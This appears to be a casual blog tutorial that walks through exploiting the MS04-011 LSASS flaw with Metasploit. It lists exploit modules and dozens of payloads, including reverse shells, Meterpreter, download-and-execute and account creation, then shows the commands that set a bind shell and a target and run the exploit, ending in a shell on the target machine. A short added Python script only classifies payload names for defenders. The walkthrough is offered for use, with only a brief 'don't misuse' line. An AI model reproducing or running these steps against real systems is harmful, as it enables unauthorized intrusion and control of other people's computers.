   windows/tftp/attftp_long_filename  Allied Telesyn TFTP Server 1.9 Long Filename Overflow
   windows/tftp/futuresoft_transfermode  FutureSoft TFTP Server 2000 Transfer-Mode Overflow
   windows/tftp/quick_tftp_pro_mode  Quick FTP Pro 2.1 Transfer-Mode Overflow
   windows/tftp/tftpd32_long_filename  TFTPD32 <= 2.21 Long Filename Buffer Overflow
   windows/tftp/tftpdwin_long_filename  TFTPDWIN v0.4.2 Long Filename Buffer Overflow
   windows/tftp/threectftpsvc_long_mode  3CTftpSvc TFTP Long Mode Buffer Overflow
   windows/unicenter/cam_log_security  CA CAM log_security() Stack Overflow (Win32)
   windows/vnc/realvnc_client  RealVNC 3.3.7 Client Buffer Overflow
   windows/vnc/ultravnc_client  UltraVNC 1.0.1 Client Buffer Overflow
   windows/vnc/winvnc_http_get  WinVNC Web Server <= v3.3.3r7 GET Overflow
   windows/wins/ms04_045_wins  Microsoft WINS Service Memory Overwrite

msf > use windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > set target 2
target => 2
msf exploit(ms04_011_lsass) > show payloads

Compatible payloads
===================

   Name  Description
   ----  -----------
   generic/debug_trap  Generic x86 Debug Trap
   generic/debug_trap/bind_ipv6_tcp  Generic x86 Debug Trap, Bind TCP Stager (IPv6)
   generic/debug_trap/bind_nonx_tcp  Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
   generic/debug_trap/bind_tcp  Generic x86 Debug Trap, Bind TCP Stager
   generic/debug_trap/reverse_http  Generic x86 Debug Trap, PassiveX Reverse HTTP Tunneling Stager
   generic/debug_trap/reverse_ipv6_tcp  Generic x86 Debug Trap, Reverse TCP Stager (IPv6)
   generic/debug_trap/reverse_nonx_tcp  Generic x86 Debug Trap, Reverse TCP Stager (No NX Support)
   generic/debug_trap/reverse_ord_tcp  Generic x86 Debug Trap, Reverse Ordinal TCP Stager
   generic/debug_trap/reverse_tcp  Generic x86 Debug Trap, Reverse TCP Stager
   generic/shell_bind_tcp  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp  Generic Command Shell, Reverse TCP Inline
   windows/adduser  Windows Execute net user /ADD
   windows/adduser/bind_ipv6_tcp  Windows Execute net user /ADD, Bind TCP Stager (IPv6)
   windows/adduser/bind_nonx_tcp  Windows Execute net user /ADD, Bind TCP Stager (No NX Support)
   windows/adduser/bind_tcp  Windows Execute net user /ADD, Bind TCP Stager
   windows/adduser/reverse_http  Windows Execute net user /ADD, PassiveX Reverse HTTP Tunneling Stager
   windows/adduser/reverse_ipv6_tcp  Windows Execute net user /ADD, Reverse TCP Stager (IPv6)
   windows/adduser/reverse_nonx_tcp  Windows Execute net user /ADD, Reverse TCP Stager (No NX Support)
   windows/adduser/reverse_ord_tcp  Windows Execute net user /ADD, Reverse Ordinal TCP Stager
   windows/adduser/reverse_tcp  Windows Execute net user /ADD, Reverse TCP Stager
   windows/dllinject/bind_ipv6_tcp  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp  Windows Inject DLL, Bind TCP Stager (No NX Support)
   windows/dllinject/bind_tcp  Windows Inject DLL, Bind TCP Stager
   windows/dllinject/reverse_http  Windows Inject DLL, PassiveX Reverse HTTP Tunneling Stager
   windows/dllinject/reverse_ipv6_tcp  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp  Windows Inject DLL, Reverse TCP Stager (No NX Support)
   windows/dllinject/reverse_ord_tcp  Windows Inject DLL, Reverse Ordinal TCP Stager
   windows/dllinject/reverse_tcp  Windows Inject DLL, Reverse TCP Stager
   windows/download_exec  Windows Executable Download and Execute
   windows/download_exec/bind_ipv6_tcp  Windows Executable Download and Execute, Bind TCP Stager (IPv6)
   windows/download_exec/bind_nonx_tcp  Windows Executable Download and Execute, Bind TCP Stager (No NX Support)
   windows/download_exec/bind_tcp  Windows Executable Download and Execute, Bind TCP Stager
   windows/download_exec/reverse_http  Windows Executable Download and Execute, PassiveX Reverse HTTP Tunneling Stager
   windows/download_exec/reverse_ipv6_tcp  Windows Executable Download and Execute, Reverse TCP Stager (IPv6)
   windows/download_exec/reverse_nonx_tcp  Windows Executable Download and Execute, Reverse TCP Stager (No NX Support)
   windows/download_exec/reverse_ord_tcp  Windows Executable Download and Execute, Reverse Ordinal TCP Stager
   windows/download_exec/reverse_tcp  Windows Executable Download and Execute, Reverse TCP Stager
   windows/exec  Windows Execute Command
   windows/exec/bind_ipv6_tcp  Windows Execute Command, Bind TCP Stager (IPv6)
   windows/exec/bind_nonx_tcp  Windows Execute Command, Bind TCP Stager (No NX Support)
   windows/exec/bind_tcp  Windows Execute Command, Bind TCP Stager
   windows/exec/reverse_http  Windows Execute Command, PassiveX Reverse HTTP Tunneling Stager
   windows/exec/reverse_ipv6_tcp  Windows Execute Command, Reverse TCP Stager (IPv6)
   windows/exec/reverse_nonx_tcp  Windows Execute Command, Reverse TCP Stager (No NX Support)
   windows/exec/reverse_ord_tcp  Windows Execute Command, Reverse Ordinal TCP Stager
   windows/exec/reverse_tcp  Windows Execute Command, Reverse TCP Stager
   windows/meterpreter/bind_ipv6_tcp  Windows Meterpreter, Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp  Windows Meterpreter, Bind TCP Stager (No NX Support)
   windows/meterpreter/bind_tcp  Windows Meterpreter, Bind TCP Stager
   windows/meterpreter/reverse_http  Windows Meterpreter, PassiveX Reverse HTTP Tunneling Stager
   windows/meterpreter/reverse_ipv6_tcp  Windows Meterpreter, Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp  Windows Meterpreter, Reverse TCP Stager (No NX Support)

windows/meterpreter/reverse_ord_tcp Windows Meterpreter, Reverse Ordinal TCP Stager

windows/meterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager

windows/reflectivedllinject/bind_ipv6_tcp Reflective Dll Injection, Bind TCP Stager (IPv6)

windows/reflectivedllinject/bind_nonx_tcp Reflective Dll Injection, Bind TCP Stager (No NX Support)

windows/reflectivedllinject/bind_tcp Reflective Dll Injection, Bind TCP Stager

windows/reflectivedllinject/reverse_http Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager

windows/reflectivedllinject/reverse_ipv6_tcp Reflective Dll Injection, Reverse TCP Stager (IPv6)

windows/reflectivedllinject/reverse_nonx_tcp Reflective Dll Injection, Reverse TCP Stager (No NX Support)

windows/reflectivedllinject/reverse_ord_tcp Reflective Dll Injection, Reverse Ordinal TCP Stager

windows/reflectivedllinject/reverse_tcp Reflective Dll Injection, Reverse TCP Stager

windows/reflectivemeterpreter/bind_ipv6_tcp Windows Meterpreter, Bind TCP Stager (IPv6)

windows/reflectivemeterpreter/bind_nonx_tcp Windows Meterpreter, Bind TCP Stager (No NX Support)

windows/reflectivemeterpreter/bind_tcp Windows Meterpreter, Bind TCP Stager

windows/reflectivemeterpreter/reverse_http Windows Meterpreter, PassiveX Reverse HTTP Tunneling Stager

windows/reflectivemeterpreter/reverse_ipv6_tcp Windows Meterpreter, Reverse TCP Stager (IPv6)

windows/reflectivemeterpreter/reverse_nonx_tcp Windows Meterpreter, Reverse TCP Stager (No NX Support)

windows/reflectivemeterpreter/reverse_ord_tcp Windows Meterpreter, Reverse Ordinal TCP Stager

windows/reflectivemeterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager

windows/reflectivevncinject/bind_ipv6_tcp Reflective VNC Dll Injection, Bind TCP Stager (IPv6)

windows/reflectivevncinject/bind_nonx_tcp Reflective VNC Dll Injection, Bind TCP Stager (No NX Support)

windows/reflectivevncinject/bind_tcp Reflective VNC Dll Injection, Bind TCP Stager

windows/reflectivevncinject/reverse_http Reflective VNC Dll Injection, PassiveX Reverse HTTP Tunneling Stager

windows/reflectivevncinject/reverse_ipv6_tcp Reflective VNC Dll Injection, Reverse TCP Stager (IPv6)

windows/reflectivevncinject/reverse_nonx_tcp Reflective VNC Dll Injection, Reverse TCP Stager (No NX Support)

windows/reflectivevncinject/reverse_ord_tcp Reflective VNC Dll Injection, Reverse Ordinal TCP Stager

windows/reflectivevncinject/reverse_tcp Reflective VNC Dll Injection, Reverse TCP Stager

windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)

windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX Support)

windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager

windows/shell/reverse_http Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager

windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)

windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX Support)

windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager

windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager

windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline

windows/shell_bind_tcp_xpfw Windows Disable Windows ICF, Command Shell, Bind TCP Inline

windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline

windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)

windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX Support)

windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager

windows/upexec/reverse_http Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager

windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)

windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX Support)

windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager

windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager

windows/vncinject/bind_ipv6_tcp Windows VNC Inject, Bind TCP Stager (IPv6)

windows/vncinject/bind_nonx_tcp Windows VNC Inject, Bind TCP Stager (No NX Support)

windows/vncinject/bind_tcp Windows VNC Inject, Bind TCP Stager

windows/vncinject/reverse_http Windows VNC Inject, PassiveX Reverse HTTP Tunneling Stager

windows/vncinject/reverse_ipv6_tcp Windows VNC Inject, Reverse TCP Stager (IPv6)

windows/vncinject/reverse_nonx_tcp Windows VNC Inject, Reverse TCP Stager (No NX Support)

windows/vncinject/reverse_ord_tcp Windows VNC Inject, Reverse Ordinal TCP Stager

windows/vncinject/reverse_tcp Windows VNC Inject, Reverse TCP Stager
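The payload names in the listing above follow a fixed scheme: `platform/stage/stager` for staged payloads (the stager, e.g. `reverse_tcp` or `bind_ipv6_tcp`, only sets up the connection and then pulls in the real stage), and `platform/single` for inline payloads that do everything in one piece. For someone defending a host this naming is the quickest way to know what to look for on the wire: a `bind_*` payload opens a new listening port on the compromised machine, a `reverse_*` payload makes an outbound connection from it, and `reverse_http` tunnels that connection over HTTP. The script below is an added example written for this post, not code from the original post or from the Metasploit project; it parses a few lines constructed in the shape of the `show payloads` output and classifies each name. The class and function names are my own.

```python
"""Classify Metasploit payload names from a `show payloads`-style listing.

Added example (not from the original post or from Metasploit). It relies only on
the naming convention visible in the listing:
  <platform>/<stage>/<stager>   staged payload, stager carries the transport
  <platform>/<single>           inline payload, the name itself carries it
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: lines copied in the shape of the listing above.
SAMPLE_LISTING = """\
generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp Generic Command Shell, Reverse TCP Inline
windows/meterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager
windows/meterpreter/bind_ipv6_tcp Windows Meterpreter, Bind TCP Stager (IPv6)
windows/shell/reverse_http Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
windows/dllinject/reverse_nonx_tcp Windows Inject DLL, Reverse TCP Stager (No NX Support)
windows/exec Windows Execute Command
windows/shell_bind_tcp_xpfw Windows Disable Windows ICF, Command Shell, Bind TCP Inline
"""

LINE_RE = re.compile(r"^(\S+)\s+(.*\S)\s*$")


@dataclass
class PayloadInfo:
    name: str
    platform: str
    stage: str
    stager: Optional[str]  # None for inline (single-stage) payloads
    description: str

    @property
    def staged(self) -> bool:
        return self.stager is not None

    @property
    def _transport_part(self) -> str:
        # The transport lives in the stager for staged payloads, in the name otherwise.
        return self.stager if self.stager is not None else self.stage

    @property
    def direction(self) -> str:
        """'bind': target listens on a new port; 'reverse': target connects out."""
        part = self._transport_part
        if part.startswith("bind") or "_bind_" in part:
            return "bind"
        if part.startswith("reverse") or "_reverse_" in part:
            return "reverse"
        return "none"  # e.g. windows/exec: runs a command, opens no channel of its own

    @property
    def transport(self) -> str:
        part = self._transport_part
        if "http" in part:
            return "http"
        if "ipv6" in part:
            return "tcp6"
        if "tcp" in part:
            return "tcp"
        return "none"

    def expected_host_behaviour(self) -> str:
        """What a defender should expect to see on the host if this payload runs."""
        if self.direction == "bind":
            return "new listening socket appears on the host"
        if self.direction == "reverse":
            return "outbound connection from the host to the operator (%s)" % self.transport
        return "no network channel; look for process/account changes instead"


def parse_listing(text: str) -> List[PayloadInfo]:
    """Parse 'name description' lines into PayloadInfo records."""
    infos: List[PayloadInfo] = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # skip blank lines and anything that is not a listing row
        name, desc = m.group(1), m.group(2)
        parts = name.split("/")
        if len(parts) == 3:
            platform, stage, stager = parts
        elif len(parts) == 2:
            platform, stage, stager = parts[0], parts[1], None
        else:
            continue  # not a payload name we understand
        infos.append(PayloadInfo(name, platform, stage, stager, desc))
    return infos


def summarize(infos: List[PayloadInfo]) -> Dict[str, int]:
    """Count payloads by connection direction."""
    counts: Dict[str, int] = {}
    for info in infos:
        counts[info.direction] = counts.get(info.direction, 0) + 1
    return counts


if __name__ == "__main__":
    for info in parse_listing(SAMPLE_LISTING):
        print("%-42s %-7s %-5s %s" % (info.name, info.direction, info.transport,
                                       info.expected_host_behaviour()))
    print(summarize(parse_listing(SAMPLE_LISTING)))
```

Run it against the full listing above (paste it into `SAMPLE_LISTING`) and the `direction` column tells you, for every payload, whether to watch for a new listener on the host or for an unexpected outbound connection from it.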

msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms04_011_lsass) > set RHOST <IPtarget>
RHOST =>
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:IPtarget[\lsarpc] ...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:IPtarget[\lsarpc] ...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (IPtarget:445 -> IPtarget:80)
[*] The DCERPC service did not reply to our request

Active sessions
===============

  Id  Description    Tunnel
  --  -----------    ------
  3   Command shell  ……./…….

It's not finished yet....

OK...... after that

msf exploit(ms04_011_lsass) > sessions -i 3
[*] Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


there you go, you're already inside the target's system......


sorry the explanation above isn't very detailed; the rest depends on the art of your own thinking. with a strong will and full confidence........ I'm sure you'll achieve what you want.... once again, don't misuse this (use Metasploit for system security)


all the tutorials I've posted I have tried myself, don't worry.....

see you in the next post.



anyone who wants to ask, go ahead, I'll gladly answer... if I know the answer, that is,